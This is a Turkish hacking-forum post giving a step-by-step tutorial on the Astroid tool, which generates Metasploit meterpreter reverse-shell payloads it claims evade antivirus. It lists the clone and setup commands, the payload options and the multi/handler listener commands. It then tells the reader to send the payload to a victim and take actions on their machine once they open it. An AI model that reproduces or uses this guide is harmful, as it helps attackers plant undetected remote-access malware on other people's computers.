Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Trojan ve Virüsler

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.





Astroid ile Payload Oluşturun // Qwx

Trojan ve Virüsler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 3 Hafta önce   #1
  • Siber Güvenlik Ekibi
  • Üye Bilgileri
Üyelik tarihi
04/2012
Nereden
İzmir
Mesajlar
Konular

Teşekkür (Etti): 77
Teşekkür (Aldı): 454


Astroid ile Payload Oluşturun // Qwx



Astroid

Bu araç sayesinde herhangi bir antivirüs programına yakalanmadan payload oluşturabilirsiniz.

Öncelikle aracımızı sistemimize indiriyoruz.
git clone https://github.com/M4sc3r4n0/astroid.git




Aracımızı indirdikten sonra cd astroid komutu ile klasöre giriş yapıyoruz.
Ardından chmod +x setup.sh komutu ile yetkilendirme işlemini yapıyoruz.




Aracın kurulum bölümü internet hızınıza göre değişkenlik göstermektedir.
Aracın çalışabilmesi adına 4 tane araç gereksinimi vardır. Program kurulum kısmında bu araçların varlığını kontrol etmektedir. Eğer ki bir veya birden fazla araç ekslikliği var ise program otomatik olarak kendisi bu araçları indirmektedir.
[ ✔ ] Métasploit-Framework..............[ found ]
[ ✔ ] Xterm.............................[ found ]
[ ✔ ] wine..............................[ found ]

[
✔ ] MinGw EXE................[ found ]
şeklinde bir çıktı aldığınız zaman kurulum işlemi çok daha kısa sürecektir ve ilgili araçların sisteminizde daha önceden kurulduğunu göstermektedir.



Kurulumun başarılı bir şekilde tamamlanmasının ardından ./astroid.sh komutu ile aracımızı çalıştırabiliriz.



Aracımızı başlattığımız zaman bu şekilde açılmaktadır. Bizlere ilk olarak Local Host IP adresimizi sormaktadır. Local Host IP adresimizi bulmak adına yeni bir terminal açarak terminalimize ifconfig komutunu yazıyoruz. İnternete bağlanmış olduğunuz cihaz wireless ise wlan* kısmında usb ise usb* kısmında ethernet ise eth* kısmında local host IP'nizi bulabilirsiniz.



Local Host IP adresimizi bulduktan sonra programda ilgili bölümü doldurup Enter'a basıyoruz. Ardından da bize Local Port sormaktadır. Local Port sorgusu için ilgili bölüme 4444 numaralı TCP bağlantı noktamızı yazıyoruz ve Enter'a basıyoruz.



Local Host IP ve Local Port tanımlamalarını yaptıkdan sonra bizlere oluşturmak istediğimiz payload'ın tipini sormaktadır. Ek olarak girişini yaptığınız bilgilerin doğruluğunu yukarıdan rahatlıkla kontrol edebilirsiniz. Programda oluşturabileceğiniz payloadlar;

1) meterpreter_reverse_tcp 5) meterpreter/reverse_https
2) meterpreter_reverse_https 6) meterpreter/reverse_winhttp
3) meterpreter/reverse_tcp 7) meterpreter/reverse_winhttps
4) meterpreter/reverse_http


Bu bölümde ben 3 numaraları payloadı kullanmak istiyorum. Ardından bizlere kodların tekrarlanması adına bir 1-70 arasında bir sayı istemektedir, bu bölüme 19 yazıyorum.



Ardından bizim verdiğimiz bilgiler dahilinde aracımız payloadı oluşturmaktadır.
Biraz beklediğimiz takdirde payload oluşumunun tamamlandığını araç bizlere bildirmektedir.



Aracın güzel bir yanı olarak da bu oluşturulan payloadı şimdi dinlemeye başlayalım mı ? sorusudur. Bu bölüme kolaylık açısından Y dediğiniz takdirde otomatik olarak Métasploit Framework açılarak ilgili tüm bilgiler araç tarafından doldurularak dinlenme işlemine başlamaktadır.



Aracın sorduğu soruya N seçeneğini seçerseniz ek olarak kendiniz Métasploit aracını başlatıp ilgili bölümleri doldurabilirsiniz.
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <localhostip>

set LPORT 4444
exploit




Ardından oluşturduğumuz payloadı kurbana yolluyoruz.
Kurban bizim oluşturduğumuz payload'ı açtığı zaman Métasploit aracı ile veya aracın otomatik olarak açmış olduğu Métasploit aracı ile istekleriniz doğrultusunda eylemlere gidebilirsiniz.




___________________________________________

A hacker does for love what others would not do for money.

Konu Qwx tarafından ( 3 Hafta önce Saat 17:00 ) değiştirilmiştir..
 Online  
 
Alıntı ile Cevapla
Teşekkür

CYANİD, RootAdam Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli

wau